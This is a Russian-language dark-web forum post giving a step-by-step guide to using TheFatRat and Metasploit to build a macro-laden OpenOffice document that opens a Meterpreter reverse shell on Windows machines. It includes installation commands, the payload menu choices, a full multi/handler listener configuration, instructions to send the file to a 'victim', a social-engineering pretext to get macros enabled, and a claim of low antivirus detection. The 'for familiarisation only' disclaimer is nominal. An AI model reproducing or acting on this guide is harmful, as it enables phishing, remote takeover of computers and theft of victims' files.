TheFatRat взлом Windows через OpenOffice

  • Автор темы HHIDE_DUMP
  • Дата начала
  • Просмотры 3K
  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Сегодня мы поговорим о том, как с помощью инструмента TheFatRat можно взломать любой компьютер на Windows.

OpenOffice -это бесплатная альтернатива Microsoft Office. Не так много, кто использует эту программу, но в небольших фирмах, университетах вынуждены пользоваться именно ей. В связи с тем, что нет бюджета на покупку официальной лицензии Microsoft, а нелицензионной пользоваться запрещено.
Не используйте это в корыстных целях, чтобы рассылать вирус по почтам фирм, людей, взломать и получить всю нужную, интересную информацию. Здесь все представлено лишь для ознакомления.
The Fat Rat - Backdoor для удаленного доступа. Использовать мы его будем на Kali Linux.
Установка


Код:
git clone https://github.com/Screetsec/TheFatRat
cd TheFatRat/
bash setup.sh
Дожидаемся окончания установки и запускаем TheFatRat из консоли командой:

Код:
fatrat
Можете ознакомиться и протестировать все приведенные способы взлома. Но те, что подписаны FUD, уже детектятся 10-20 антивирусами, в том числе и вирус Microsoft Office.

Создание вируса

Посмотреть вложение 8744

Вводим
Код:
7
Посмотреть вложение 8745

Вводим

Код:
4
и ваш IPV4 адрес, любой неиспользуемый порт, затем название документа
Посмотреть вложение 8747
Выбираем полезную нагрузку, например, 6.

Посмотреть вложение 8748

Все, ваш файл готов по указанному пути. Отправляйте жертве.

Посмотреть вложение 8749

Взлом
Далее мы должны подождать пока сессия откроется. Используем metasploit.
Код:
msfconsole
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler)  > set LPORT 443
msf exploit (handler) >exploit
Посмотреть вложение 8750

Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter.

Рассылая письмом под видом важного документа, необходимо использовать СИ, чтобы разрешили запуск макросов. К примеру, "в документе приведены расчеты за каждый месяц 2019 года. Для автоматического запуска расчетов необходимо разрешить выполнение макросов. "
Ну и все. А дальше делать в консоли можно все, что захотите. Скачивайте, скриньте итп.
Детект вируса 2/38
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя